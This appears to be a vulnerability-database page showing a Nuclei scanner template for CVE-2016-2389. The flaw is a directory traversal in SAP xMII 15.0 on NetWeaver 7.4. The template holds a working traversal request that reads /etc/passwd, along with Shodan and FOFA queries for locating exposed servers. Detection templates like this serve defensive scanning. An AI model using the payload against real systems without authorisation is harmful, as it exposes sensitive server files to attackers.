Lucene search

K

SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion

🗓️ 06 Aug 2021 17:56:35Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

SAP xMII 15.0, NetWeaver 7.4 - Local File Inclusion vulnerabilit

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Refs
Code
ReporterTitlePublishedViews
Family
Prion
Directory traversal
16 Feb 201615:59
prion
erpscan
SAP xMII - directory traversal vulnerability
29 Jul 201500:00
erpscan
exploitpack
SAP xMII 15.0 - Directory Traversal
17 May 201600:00
exploitpack
Packet Storm
SAP MII 15.0 Directory Traversal
16 May 201600:00
packetstorm
CVE
CVE-2016-2389
16 Feb 201615:59
cve
0day.today
SAP xMII 15.0 - Directory Traversal
17 May 201600:00
zdt
Cvelist
CVE-2016-2389
16 Feb 201615:00
cvelist
NVD
CVE-2016-2389
16 Feb 201615:59
nvd
Exploit DB
SAP xMII 15.0 - Directory Traversal
17 May 201600:00
exploitdb
id: CVE-2016-2389

info:
  name: SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion
  author: daffainfo
  severity: high
  description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
  remediation: |
    Apply the latest security patches and updates provided by SAP to mitigate the vulnerability.
  reference:
    - https://web.archive.org/web/20211209003818/https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
    - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
    - https://www.exploit-db.com/exploits/39837/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2389
    - http://seclists.org/fulldisclosure/2016/May/40
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2016-2389
    cwe-id: CWE-22
    epss-score: 0.24589
    epss-percentile: 0.96217
    cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: netweaver
    shodan-query:
      - http.favicon.hash:-266008933
      - cpe:"cpe:2.3:a:sap:netweaver"
    fofa-query: icon_hash=-266008933
  tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e717d9614f9be406201543141ea6197277ab6085b68d14db8a50bd6b65c9fca402205c2138bb146f2b1f606da9469e28d1e8aa1fce93d5fffa6ae0ad3f234811d842:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
06 Aug 2021 17:35Current
7.3High risk
Vulners AI Score7.3
CVSS27.8
CVSS37.5
EPSS0.8079
14
.json
Report